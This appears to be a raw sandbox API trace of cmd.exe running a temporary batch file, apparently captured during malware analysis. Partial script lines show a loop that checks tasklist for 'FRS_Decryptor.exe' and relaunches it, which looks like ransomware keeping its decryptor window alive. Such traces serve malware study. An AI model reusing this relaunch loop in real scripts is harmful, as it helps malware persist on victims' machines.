_get_osfhandle (_FileHandle=0) returned 0x24 [0117.562] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0117.562] SetConsoleInputExeNameW () returned 0x1 [0117.562] GetConsoleOutputCP () returned 0x1b5 [0117.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0117.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.563] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0117.563] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0117.563] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.563] SetFilePointer (in: hFile=0x318, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0117.563] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0117.563] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0117.563] SetFilePointer (in: hFile=0x318, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0117.563] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0117.563] GetFileType (hFile=0x318) returned 0x1 [0117.563] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.563] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0117.563] _tell (_FileHandle=3) returned 2512 [0117.563] _close (_FileHandle=3) returned 0 [0117.563] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0117.563] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0117.563] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0117.563] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0117.563] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0117.563] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0117.563] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0117.563] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0117.563] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0117.563] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0117.563] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0117.563] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0117.563] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0117.563] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0117.563] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0117.563] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0117.563] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0117.563] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0117.563] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0117.564] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0117.564] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0117.564] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0117.564] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0117.564] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0117.564] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0117.564] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0117.564] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0117.564] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0117.564] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0117.564] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0117.564] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0117.564] _wcsicmp (_String1="ping", _String2="START") returned -3 [0117.564] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0117.564] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0117.564] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0117.564] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0117.564] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0117.564] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0117.564] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0117.564] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0117.564] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0117.564] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0117.564] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0117.564] SetErrorMode (uMode=0x0) returned 0x0 [0117.564] SetErrorMode (uMode=0x1) returned 0x0 [0117.564] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0117.564] SetErrorMode (uMode=0x0) returned 0x1 [0117.564] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.564] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0117.564] GetLastError () returned 0x2 [0117.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0117.565] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0117.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0117.565] GetLastError () returned 0x2 [0117.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0117.565] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0117.565] GetFileType (hFile=0x28) returned 0x2 [0117.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0117.565] _dup (_FileHandle=1) returned 3 [0117.565] _close (_FileHandle=1) returned 0 [0117.565] _wcsicmp (_String1="nul", _String2="con") returned 11 [0117.565] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0117.565] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0117.565] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.565] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0117.565] SetErrorMode (uMode=0x0) returned 0x0 [0117.565] SetErrorMode (uMode=0x1) returned 0x0 [0117.566] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0117.566] SetErrorMode (uMode=0x0) returned 0x1 [0117.566] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.566] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.566] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0117.566] GetLastError () returned 0x2 [0117.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0117.566] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0117.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0117.566] GetLastError () returned 0x2 [0117.566] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a070 [0117.566] FindClose (in: hFindFile=0xd5a070 | out: hFindFile=0xd5a070) returned 1 [0117.566] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.566] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0117.567] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0117.567] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0117.567] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0117.567] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0117.567] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x158, dwProcessId=0xba4, dwThreadId=0xb90)) returned 1 [0117.570] CloseHandle (hObject=0x158) returned 1 [0117.570] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.570] GetEnvironmentStringsW () returned 0xd7e510* [0117.570] FreeEnvironmentStringsA (penv="=") returned 1 [0117.570] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0119.643] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0119.643] CloseHandle (hObject=0x36c) returned 1 [0119.643] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0119.643] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.643] GetEnvironmentStringsW () returned 0xd30508* [0119.643] FreeEnvironmentStringsA (penv="=") returned 1 [0119.643] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.644] GetEnvironmentStringsW () returned 0xd7e510* [0119.644] FreeEnvironmentStringsA (penv="=") returned 1 [0119.644] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0119.644] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0119.644] _close (_FileHandle=3) returned 0 [0119.644] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.644] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0119.644] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.644] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0119.644] _get_osfhandle (_FileHandle=0) returned 0x24 [0119.644] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0119.645] SetConsoleInputExeNameW () returned 0x1 [0119.645] GetConsoleOutputCP () returned 0x1b5 [0119.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0119.645] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.645] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0119.645] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0119.645] _get_osfhandle (_FileHandle=3) returned 0x318 [0119.645] SetFilePointer (in: hFile=0x318, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0119.645] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0119.645] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0119.646] SetFilePointer (in: hFile=0x318, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0119.646] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0119.646] GetFileType (hFile=0x318) returned 0x1 [0119.646] _get_osfhandle (_FileHandle=3) returned 0x318 [0119.646] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0119.646] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0119.646] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0119.646] SetFilePointer (in: hFile=0x318, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0119.646] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0119.646] GetFileType (hFile=0x318) returned 0x1 [0119.646] _get_osfhandle (_FileHandle=3) returned 0x318 [0119.646] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0119.647] _tell (_FileHandle=3) returned 2627 [0119.647] _close (_FileHandle=3) returned 0 [0119.647] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0119.647] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0119.647] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0119.647] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0119.647] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0119.652] feof (_File=0x76ea4c68) returned 0 [0119.652] ferror (_File=0x76ea4c68) returned 0 [0119.652] fgets (in: _Buf=0xd81c28, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0120.151] feof (_File=0x76ea4c68) returned 0 [0120.151] ferror (_File=0x76ea4c68) returned 0 [0120.151] fgets (in: _Buf=0xd85d26, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0120.188] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0120.188] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd431a6, cbMultiByte=78, lpWideCharStr=0xd43158, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0120.188] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0120.188] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0120.189] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0120.189] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0120.189] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] GetFileType (hFile=0x24c) returned 0x1 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0120.189] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0120.189] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] GetFileType (hFile=0x24c) returned 0x1 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0120.189] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0120.189] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0120.189] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.189] GetFileType (hFile=0x24c) returned 0x1 [0120.189] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0120.190] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, 